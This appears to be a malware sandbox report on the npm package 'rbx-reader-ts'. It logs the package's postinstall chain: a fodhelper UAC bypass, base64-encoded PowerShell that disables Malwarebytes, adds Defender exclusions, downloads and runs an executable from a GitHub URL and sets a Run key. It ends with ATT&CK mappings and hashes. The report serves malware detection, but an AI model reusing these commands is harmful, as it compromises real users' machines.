        cmd.exe /d /s /c "start "" "C:\Windows\System32\fodhelper.exe""
        5⤵
        
        PID:1300
      - C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        6⤵
        
        PID:5444
        
        C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe
        
        "C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe" /c powershell -Command "$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        7⤵
        Executes dropped EXE
        
        PID:6128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:5876
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jcmofjev\jcmofjev.cmdline"
        9⤵
        
        PID:5396
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC02.tmp" "c:\Users\Admin\AppData\Local\Temp\jcmofjev\CSC7BFE1353DF4C48A0B1869772927638BF.TMP"
        10⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\Onedrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Onedrive.exe"
        9⤵
        Executes dropped EXE
        
        PID:5584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }""
        5⤵
        
        PID:736
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\ms-settings" /f"
        5⤵
        
        PID:3124
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\ms-settings" /f
        6⤵
        Modifies registry class
        
        PID:4536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\ca75muodqnve38eo8skc" /f"
        5⤵
        
        PID:4996
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\ca75muodqnve38eo8skc" /f
        6⤵
        Modifies registry class
        
        PID:4172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:5700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:2676
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:2744
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" install rbx-reader-ts
  2⤵
  - Executes dropped EXE
  PID:4200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:5208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:2684
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:1092
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" install rbx-reader-ts
  2⤵
  - Executes dropped EXE
  PID:5720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c exit 0
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c node postinstall
    3⤵
    PID:1812
  - - C:\Program Files\nodejs\node.exe
      node postinstall
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\Admin\AppData\screenshot.png" "
        5⤵
        
        PID:4552
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7FA.tmp" "c:\Users\Admin\AppData\Local\Temp\screenCapture\CSC7B458916426840EEBF9818787023B41.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3420
      - C:\Users\Admin\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
        
        screenCapture_1.3.2.exe "C:\Users\Admin\AppData\screenshot.png"
        6⤵
        Executes dropped EXE
        
        PID:5000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\sn38h4mo3yegjar53e7s\Shell\open\command" /f"
        5⤵
        
        PID:4272
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\sn38h4mo3yegjar53e7s\Shell\open\command" /f
        6⤵
        Modifies registry class
        
        PID:3032
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\sn38h4mo3yegjar53e7s\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe" /f"
        5⤵
        
        PID:4508
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\sn38h4mo3yegjar53e7s\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe" /f
        6⤵
        Modifies registry class
        
        PID:3760
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f"
        5⤵
        
        PID:2756
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f
        6⤵
        Modifies registry class
        
        PID:5496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f"
        5⤵
        
        PID:4900
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f
        6⤵
        
        PID:5612
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f"
        5⤵
        
        PID:4328
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        6⤵
        Modifies registry class
        
        PID:3792
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /d /s /c "start "" "C:\Windows\System32\fodhelper.exe""
        5⤵
        
        PID:5412
      - C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        6⤵
        
        PID:3748
        
        C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe
        
        "C:\WindowsApi\6742f35676188b60edccbaefb71aab415ab42054.exe" /c powershell -Command "$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        7⤵
        Executes dropped EXE
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        8⤵
        Blocklisted process makes network request
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        
        PID:5260
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n3zrwgv5\n3zrwgv5.cmdline"
        9⤵
        
        PID:2772
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC30.tmp" "c:\Users\Admin\AppData\Local\Temp\n3zrwgv5\CSC86F456D27EBF4AB08E22CD3AA1DD6FD5.TMP"
        10⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\Onedrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Onedrive.exe"
        9⤵
        Executes dropped EXE
        
        PID:2504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }""
        5⤵
        
        PID:4548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\ms-settings" /f"
        5⤵
        
        PID:5684
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\ms-settings" /f
        6⤵
        Modifies registry class
        
        PID:1480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\sn38h4mo3yegjar53e7s" /f"
        5⤵
        
        PID:4520
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\sn38h4mo3yegjar53e7s" /f
        6⤵
        Modifies registry class
        
        PID:5520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57d35e.rbs

Filesize
935KB

MD5
acf0f6fece69b83c6155f8a1cc5f7f89

SHA1
8433a230e4b2ade7f4ba4eb2ee56e210c7e5148a

SHA256
49d1320f66d12309886f4d9fba6572515b249b36d67428848226a5cc90a06246

SHA512
bdf5b0e0193c8f7fba0233c03749b90d7af21ab392a989d090cc412e4874606b68ffad71f0888ff0140e2df382775e8f26112a0d7b6f1cfc6ba5c450e032aff8

Download Submit
C:\Program Files\nodejs\node_modules\npm\bin\npm-prefix.js

Filesize
864B

MD5
92dd1b5a463374142271ff420cb473a5

SHA1
a9f946c6a8c6f273f837703acc74c367b7781a99

SHA256
673f620e40137c295f2cf057364468bf3a71653dfc0973be895ebf7a8c368c2e

SHA512
5e0a6e4a9cff4b37acbece070a592a65ed044a78e1b104517eb5bb233d4398f67140b44e986e7a2de16bfb65b0ab7609e831341efea2a6f583258b6a85f70e01

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\index.js

Filesize
29KB

MD5
a2819bc319ade96e220b81c11ba1fd62

SHA1
f711920489d12ac7704e323de4cea98009299e7d

SHA256
9976a7f202a683370a170f8ab053d89cf6450c9d0596d8bed92bb762f0dca92e

SHA512
64b409c59d3e7df84ddd87163fb03f38d1bbed259323392685e01103ff9d2a43b456a5df5812e2bd3de61e0ae61520ccad444a92ea908a15bd871146630edd32

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\type-defs.js

Filesize
1KB

MD5
8385a8a608e5cdd5a79957a6c979fb28

SHA1
d20fd55ae3664cd339245fdd26a28983baf97f2e

SHA256
5f8cab3a4133b226c653784d569a9bf3e5a2ee76ac73b9156cd58a2c72839648

SHA512
